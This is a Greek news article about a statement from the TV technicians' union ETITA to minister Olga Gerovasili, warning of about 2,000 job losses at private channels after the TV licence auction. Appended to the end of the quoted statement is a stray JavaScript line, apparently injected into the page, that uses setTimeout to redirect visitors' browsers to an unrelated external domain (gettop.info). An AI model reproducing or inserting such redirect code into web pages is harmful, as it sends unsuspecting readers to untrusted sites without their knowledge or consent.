Τεχνικοί τηλεόρασης προς Γεροβασίλη: Tο μαύρο είναι ένα χρώμα χωρίς αποχρώσεις

0
10

 

Tην ανησυχία τους για το μέλλον και τη διαμόρφωση του τηλεοπτικού τοπίου και την ανεργία που θα χτυπήσει τον κλάδο εκφράζουν οι τεχνικοί της τηλεόρασης με ανακοίνωση τους με την οποία απευθύνονται προς την Όλγα Γεροβασίλη λέγοντας: «Πρέπει να γνωρίζετε πως το μαύρο είναι ένα χρώμα που δεν έχει αποχρώσεις. Το μαύρο της περασμένης κυβέρνησης δεν ήταν στην τηλεόραση της ΕΡΤ αλλά στις ψυχές 2.500 εργαζομένων και των οικογενειών τους. Το μαύρο το δικό σας θα είναι στις ψυχές 2.000 εργαζομένων των ιδιωτικών τηλεοπτικών σταθμών. Βρίσκετε να έχουν κάποια διαφορά;»

Αναλυτικά η ανακοίνωση της ΕΤΙΤΑ έχει ως εξής: «Μετά την ολοκλήρωση της δημοπράτησης των νέων τηλεοπτικών αδειών από την Κυβέρνηση, 2000 περίπου εργαζόμενοι 4 τηλεοπτικών σταθμών (ALPHA, STAR, MEGA και ΕΨΙΛΟΝ), είναι πλέον επί ξύλου κρεμάμενοι χωρίς να γνωρίζουν τι τους ξημερώνει. Η μεγάλη πλειοψηφία των εργαζομένων αυτών είναι άνθρωποι με πολλά χρόνια στους σταθμούς τους και έχουν αποκτήσει ανάλογα εργασιακά δικαιώματα.

Τα δύο νέα κανάλια που θα δημιουργηθούν είναι αδύνατον να απορροφήσουν όλον αυτόν τον κόσμο αλλά ακόμα και αυτοί που θα προσληφθούν, λόγω κατάργησης της επεκτατικότητας των Σ.Σ.Ε., θα αμείβονται με μισθούς… πείνας. Απαιτούμε λοιπόν από την κυβέρνηση, το πρόβλημα που η ίδια δημιούργησε, να βρει τρόπο να το λύσει ΑΜΕΣΑ !! Το πρόβλημα της διαπλοκής δεν λύνεται με παράπλευρες απώλειες χιλιάδων νέων ανέργων.

Συνάδελφοι,

Την ερχόμενη εβδομάδα αναμένουμε συνάντηση με τους κυβερνητικούς φορείς και τις Διοικήσεις των σταθμών και μετά θα πραγματοποιηθεί άμεσα Έκτακτη Γενική Συνέλευση για να καθοριστούν οι επόμενες κινήσεις μας.

Υ.Γ.) Κυρία Όλγα Γεροβασίλη.

Πρέπει να γνωρίζετε πως το μαύρο είναι ένα χρώμα που δεν έχει αποχρώσεις. Το μαύρο της περασμένης κυβέρνησης δεν ήταν στην τηλεόραση της ΕΡΤ αλλά στις ψυχές 2.500 εργαζομένων και των οικογενειών τους. Το μαύρο το δικό σας θα είναι στις ψυχές 2.000 εργαζομένων των ιδιωτικών τηλεοπτικών σταθμών. Βρίσκετε να έχουν κάποια διαφορά;;» setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here